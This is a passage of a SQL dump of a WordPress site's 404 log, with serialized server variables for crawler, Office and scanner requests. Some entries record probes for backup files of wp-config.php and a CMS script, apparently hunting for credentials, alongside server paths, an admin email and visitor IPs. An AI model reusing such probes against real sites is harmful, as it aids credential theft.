aid=9090\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Y0eBT1onqG4TOWhlGLAAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674897.5559\";s:12:\"REQUEST_TIME\";s:10:\"1570674897\";}}','notice','2019-10-10 02:34:59','2019-10-10 02:34:57',35047208,36847552,'https://bintara.com.my/plus/mytag_js.php%20aid=9090',1,0,'213.23.47.13'),(27844,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9E66C0DF-BA24-4E25-ABCC-899675E4BE06\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Zfn6YXSDJF91Gv2PzDAAAABA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.135.200.88\";s:11:\"REMOTE_PORT\";s:5:\"28906\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Zfn6YXSDJF91Gv2PzDAAAABA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570675070.254\";s:12:\"REQUEST_TIME\";s:10:\"1570675070\";}}','notice','2019-10-10 02:37:52','2019-10-10 02:37:50',35397848,37198432,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.135.200.88'),(27845,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:71:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Word 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"0\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"620D6433-B965-4F85-924D-B1B14E84CF79\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6h1eBT1onqG4TOWhlNeQAAARA\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"51917\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6h1eBT1onqG4TOWhlNeQAAARA\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570677205.5275\";s:12:\"REQUEST_TIME\";s:10:\"1570677205\";}}','notice','2019-10-10 03:13:28','2019-10-10 03:13:25',35790408,37591720,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27846,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"314\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.12026; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:10:\"Production\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"620D6433-B965-4F85-924D-B1B14E84CF79\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.12026\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6oHOBT1onqG4TOWhlTYwAAARQ\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:13:\"115.132.144.1\";s:11:\"REMOTE_PORT\";s:5:\"52451\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6oHOBT1onqG4TOWhlTYwAAARQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570678812.7615\";s:12:\"REQUEST_TIME\";s:10:\"1570678812\";}}','notice','2019-10-10 03:40:14','2019-10-10 03:40:13',35398048,37204736,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'115.132.144.1'),(27847,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ60in6YXSDJF91Gv2P7RwAAAAc\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.31\";s:11:\"REMOTE_PORT\";s:5:\"39820\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ60in6YXSDJF91Gv2P7RwAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570681994.5273\";s:12:\"REQUEST_TIME\";s:10:\"1570681994\";}}','notice','2019-10-10 04:33:17','2019-10-10 04:33:14',34414832,34771976,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.31'),(27848,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:25:\"/blog/tag/logitech-rally/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:19:\"REDIRECT_SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ635@BT1onqG4TOWhlg@QAAAQ8\";s:12:\"REDIRECT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.103\";s:11:\"REMOTE_PORT\";s:4:\"3671\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:47:\"https://bintara.com.my/blog/tag/logitech-rally/\";s:10:\"SCRIPT_URL\";s:25:\"/blog/tag/logitech-rally/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ635@BT1onqG4TOWhlg@QAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570682855.806\";s:12:\"REQUEST_TIME\";s:10:\"1570682855\";}}','notice','2019-10-10 04:47:38','2019-10-10 04:47:36',33991720,35792840,'https://bintara.com.my/blog/tag/logitech-rally/',1,0,'207.46.13.103'),(27849,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/my-account/lost-password/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:15:\"gzip,deflate,br\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_FROM\";s:26:\"googlebot(at)googlebot.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:198:\"Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.96 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:19:\"REDIRECT_SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ64YH6YXSDJF91Gv2P8mQAAAAc\";s:12:\"REDIRECT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"REMOTE_ADDR\";s:12:\"66.249.71.31\";s:11:\"REMOTE_PORT\";s:5:\"42581\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:48:\"https://bintara.com.my/my-account/lost-password/\";s:10:\"SCRIPT_URL\";s:26:\"/my-account/lost-password/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ64YH6YXSDJF91Gv2P8mQAAAAc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570682976.5586\";s:12:\"REQUEST_TIME\";s:10:\"1570682976\";}}','notice','2019-10-10 04:49:38','2019-10-10 04:49:36',33943512,34300248,'https://bintara.com.my/my-account/lost-password/',1,0,'66.249.71.31'),(27850,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/wp-config.php-old\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php-old\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php-old\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68geBT1onqG4TOWhllgAAAAQ8\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php-old\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/wp-config.php-old\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68geBT1onqG4TOWhllgAAAAQ8\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"185.220.101.31\";s:11:\"REMOTE_PORT\";s:5:\"40961\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/wp-config.php-old\";s:10:\"SCRIPT_URL\";s:18:\"/wp-config.php-old\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ68geBT1onqG4TOWhllgAAAAQ8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570684033.4563\";s:12:\"REQUEST_TIME\";s:10:\"1570684033\";}}','notice','2019-10-10 05:07:16','2019-10-10 05:07:13',35436112,37239000,'https://bintara.com.my/wp-config.php-old',1,0,'185.220.101.31'),(27851,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:46:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:19:\"/wp-config.php.save\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=0ba6514538b8f7a5dd4fe659e9fa189d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:147:\"Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; SAMSUNG-SGH-I317 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ68jOBT1onqG4TOWhlluwAAARM\";s:19:\"REDIRECT_SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ68jOBT1onqG4TOWhlluwAAARM\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"171.25.193.77\";s:11:\"REMOTE_PORT\";s:5:\"55215\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:41:\"https://bintara.com.my/wp-config.php.save\";s:10:\"SCRIPT_URL\";s:19:\"/wp-config.php.save\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\